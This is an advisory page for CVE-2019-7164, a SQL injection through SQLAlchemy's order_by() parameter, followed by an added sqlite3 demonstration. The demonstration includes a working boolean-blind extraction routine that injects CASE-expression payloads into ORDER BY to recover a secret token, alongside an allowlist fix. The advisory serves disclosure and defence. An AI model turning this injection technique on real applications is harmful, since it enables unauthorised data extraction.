PT-2019-5718 · Sqlalchemy+5

Published 2019-02-01 · Updated 2024-06-15 · CVE-2019-7164

CVSS v4.0: 10 Critical
Vector: AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Name of the Vulnerable Software and Affected Versions: SQLAlchemy 1.2.17 and earlier; SQLAlchemy 1.3.x through 1.3.0b2
Description: SQL injection via the order_by parameter. A string handed to order_by() that does not name a column is coerced into a raw SQL fragment and emitted verbatim into the ORDER BY clause of the generated statement, so the structure of the query is not protected. An attacker who controls that string can execute arbitrary SQL with the privileges of the application's database connection, for example by injecting a subquery or a CASE expression that turns the sort order into a boolean oracle for data in other tables.
Recommendations: For SQLAlchemy 1.2.17 and earlier, update to a version later than 1.2.17. For SQLAlchemy 1.3.x through 1.3.0b2, update to a version later than 1.3.0b2. As a temporary workaround, never pass untrusted strings to order_by(): map client-supplied sort keys through an allowlist to column objects (or to fixed column names and directions) and reject anything that does not match.
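The following is an added example, not code from this advisory or from the SQLAlchemy project. It uses the standard-library sqlite3 module to emulate the effect described above (an untrusted sort string reaching the ORDER BY clause verbatim, which is what the pre-fix string coercion produced), shows how that turns sort order into a boolean oracle for a table the query never names, and then the allowlist mapping that the workaround amounts to. The schema, the token value and the helper names are constructed for illustration.

```python
import re
import sqlite3

# Constructed sample schema, not taken from the advisory: a table the
# application sorts, plus a second table the attacker should never reach.
SAMPLE_SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL);
INSERT INTO users VALUES (1, 'alice'), (2, 'bob'), (3, 'carol');
CREATE TABLE secrets (id INTEGER PRIMARY KEY, token TEXT NOT NULL);
INSERT INTO secrets VALUES (1, 'tok-9f1c');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    return conn


def list_users_vulnerable(conn, order_by):
    """Emulates the pre-fix behaviour: an untrusted sort string that is not a
    column name is coerced to raw SQL and lands in ORDER BY verbatim."""
    return conn.execute("SELECT id, name FROM users ORDER BY " + order_by).fetchall()


def leak_secret_via_order_by(conn, length, alphabet="abcdefghijklmnopqrstuvwxyz0123456789-"):
    """Boolean-based blind extraction through the sort order: the CASE flips the
    result order depending on a guess about one character of secrets.token."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            payload = (
                f"CASE WHEN (SELECT substr(token, {pos}, 1) FROM secrets) = '{ch}' "
                f"THEN id ELSE -id END"
            )
            # Guess right -> ascending by id, first row is id 1; wrong -> descending.
            if list_users_vulnerable(conn, payload)[0][0] == 1:
                recovered += ch
                break
    return recovered


# Hardened form: the client chooses only from an allowlist; the SQL fragment is
# built from our own constants, never from the request string.
ALLOWED_SORT_COLUMNS = {"id", "name"}
_SORT_PARAM = re.compile(r"(-?)([a-z_]+)")


def parse_sort(param):
    """Accepts 'name' or '-name' (descending); anything else is rejected."""
    m = _SORT_PARAM.fullmatch(param)
    if m is None or m.group(2) not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort key: {param!r}")
    return m.group(2), "DESC" if m.group(1) else "ASC"


def list_users_safe(conn, sort_param):
    column, direction = parse_sort(sort_param)
    # With SQLAlchemy the same mapping would hand order_by() a column object,
    # e.g. getattr(User, column), rather than any string.
    return conn.execute(f"SELECT id, name FROM users ORDER BY {column} {direction}").fetchall()


if __name__ == "__main__":
    db = make_db()
    print(leak_secret_via_order_by(db, 8))  # recovers 'tok-9f1c' from the sample data
    print(list_users_safe(db, "-name"))
    try:
        list_users_safe(db, "CASE WHEN 1=1 THEN id ELSE -id END")
    except ValueError as exc:
        print("rejected:", exc)
```

The leak works because each request returns the rows in one of two orders depending on a condition the attacker wrote, so no error message or data from the secrets table ever needs to appear in the response. The hardened version interpolates only values that came out of the allowlist, which is why f-string construction is acceptable there and not in the vulnerable function.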

Exploit

Fix

SQL injection


Weakness Enumeration

Related Identifiers

ALSA-2019:0981
ALSA-2019:0984
BDU:2021-00766
CESA-2019_0981
CESA-2019_0984
CVE-2019-7164
DLA-1718-1
DLA-2811-1
GHSA-887W-45RQ-VXGF
MGASA-2019-0350
OESA-2021-1039
OESA-2021-1071
OPENSUSE-SU-2019:2039-1
OPENSUSE-SU-2019:2064-1
OPENSUSE-SU-2019:2078-1
OPENSUSE-SU-2019_2039-1
OPENSUSE-SU-2019_2064-1
OPENSUSE-SU-2024:11211-1
OPENSUSE-SU-2024:12915-1
PYSEC-2019-123
RHSA-2019:0981
RHSA-2019:0984
RHSA-2019_0981
RHSA-2019_0984
RLSA-2019:0981
RLSA-2019:0984
SUSE-SU-2019:2211-1
SUSE-SU-2019:2253-1
SUSE-SU-2019:2253-2
SUSE-SU-2019:2261-1
SUSE-SU-2019:2267-1
SUSE-SU-2019:2350-1
SUSE-SU-2019:2374-1
SUSE-SU-2019_2211-1
SUSE-SU-2019_2253-1
SUSE-SU-2019_2253-2

Affected Products

Almalinux
Centos
Red Hat
Rocky Linux
Sqlalchemy
Suse